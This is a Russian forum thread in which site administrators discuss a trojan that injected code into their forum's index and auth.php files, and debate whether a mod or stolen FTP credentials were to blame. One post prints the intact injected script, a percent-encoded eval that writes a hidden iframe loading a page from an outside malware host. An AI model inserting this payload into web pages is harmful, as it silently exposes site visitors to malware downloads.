Как убить Трояна?

[Dort]

Не избежал этой участи и я
Стоял NOD32, даже не пискнул. Поставил Касперского и офонарел. Заражены все index'ые файлы и auth.php.
Визуально это выглядит так. Перестает отображаться картинка визуального подтверждения регистрации и мода ABQ.
Лечение: перезалил все зараженные файлы из резервной копии, сменил пароль доступа по FTP, перестал хранить пароли в FAR'e.

PS: После установки Касперского (я его терпеть не могу) за два дня он меня уже пять раз предупреждал об опасности заражения этим трояном на разных сайтах. Пришлось его оставить. Вот так вот!

[Fenix1982]

Странно. Я вот обратил внимание, что тоже вирус с ABQ связан...

У меня ситуация следующая:

Поставил ABQ. Всё по инструкции, доступы, итд проверил. Пароль в настройках доступа на ФТП не сохраняется. Пароль больше 10 знаков в разном регистре (буквы-числа). Стоит обновляемый Нортон Антивирус 2007.

Внести вирус от себя я не мог. На ФТП более никто не заходит.

Тем не менее, при входе на форум, вылетело предупреждение о вирусном заражении. Вирус - Downloader. Сожрал, собака, все индексы...

Нет ли, всё-таки, уязвимости в ABQ?

[Rayden]

нету

[VVVas]

Стоит обновляемый Нортон Антивирус 2007. Внести вирус от себя я не мог.

То что вы в этом уверены не говорит абсолютно ни о чем.

[Fenix1982]

Возможно.

Но тогда нет логики:

1) На сайте он вирус увидел, а у меня нет?
2) Запуск других антивирусов тоже ничего не показал. Им тоже можно не верить?

[Rayden]

У многих стоит ABQ, а вируса нет. Но вы упорно ассоциируете его с вирусом. Где логика?

[Палыч]

На ФТП более никто не заходит.

1. На основании чего вывод? Потому, что вы не давали никому права? Тогда, не факт.
2. К конкретному серверу-компьютеру доступ имеете только вы?

[Fenix1982]

К конкретному компьютеру, отуда идёт доступ на ФТП - только я.

По поводу Фтп... Тут сложно сказать. Я знаю ip, с которого произошёл разовый доступ на ФТП при заражении. Мне он не знаком.

Проследить, как именно он вошёл на ФТП я не могу. Но то, что был получен доступ к паролям... Я считаю мало вероятным. Фаерволл не выпустил бы информацию отсылаемую трояном с моего компьютера, даже если такаябы и была. Да и не держу я пароли в электронном виде. И не сохраняю...

Я не говорю, что в программе 100%-я дыра... Но откуда-то ноги расти должны...

[Палыч]

К конкретному компьютеру, отуда идёт доступ на ФТП - только я.

Речь не откуда, речь о сервере - куда...

Я знаю ip, с которого произошёл разовый доступ на ФТП при заражении.

что уже противоречит вашим же словам:

На ФТП более никто не заходит.

Но то, что был получен доступ к паролям... Я считаю мало вероятным.

Я рад за вас.

... Но откуда-то ноги расти должны...

Вы уже ответили ->

Я знаю ip, с которого произошёл разовый доступ на ФТП при заражении.

Я не говорю, что в программе 100%-я дыра...

Правильно. 100% гарантии не существует вообще.
Только вот, незадача: даже предполагаемая "дыра" в php-коде никак не связана с доступом по FTP или с получением хранимых паролей.

[Fenix1982]

Скажем так. Кроме меня, никто туда не заходит, так как только я занимаюсь этим форумом. Пароли тоже только у меня.

Имея ввиду, что кроме меня там никого не бывает, я имел ввиду, то, что написал выше.


Как я уже сказал - я не исключаю, что это где-то и мой косяк. Но странно всё-таки: до этого ни вирусов, ни проблем не было. Поставил ABQ? и появилось.

Но доверяясь вашему авторитетному мнению, буду искать косяки у себя.

Хотя всё-равно, странно.

[Палыч]

Но странно всё-таки: до этого ни вирусов, ни проблем не было. Поставил ABQ? и появилось

Всё когда-то случается в первый раз.
Но если вы при выходе из булочной попали под дождь, не означает, что булочник виноват.

[Rayden]

Fenix1982
Ничего странного. Видимо перед установкой мода вы не помыли руки, а монитор не был ориентирован строго на порярную звезду.

[PanAm]

Хотел создать тему, но тут такое-же
добавлен код в файлы index.htm, index.php, auth.php

Код: Выделить всё

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73
%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b
%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74
%65%28%27%3c%69%66%72%61%6d%65%20%6e%61
%6d%65%3d%38%34%39%30%66%39%38%64%39%20
%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f
%61%74%6f%6d%61%6b%61%79%61%6e%2e%62%69
%7a%2f%69%6e%64%65%78%2e%70%68%70%3f%6f
%75%74%3d%31%31%39%30%32%33%38%37%33%32
%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28
%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a
%31%30%38%30%37%30%29%2b%27%36%30%5c%27%20
%77%69%64%74%68%3d%35%30%35%20%68%65%69%67
%68%74%3d%32%31%34%20%73%74%79%6c%65%3d%5c
%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65
%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>


Добавлено спустя 2 минуты 12 секунд:

FTP-менеджер - FAR

Добавлено спустя 6 минут 19 секунд:

DrWeb определил как -Trojan.DownLoader.33840

[Петрович]

При открытии темы Как зашел? NOD ругнулся, определил как вирус HTML/Phishing.gen троян.

[rxu]

А мой НОД молчит. Вирусные базы - сегодняшние...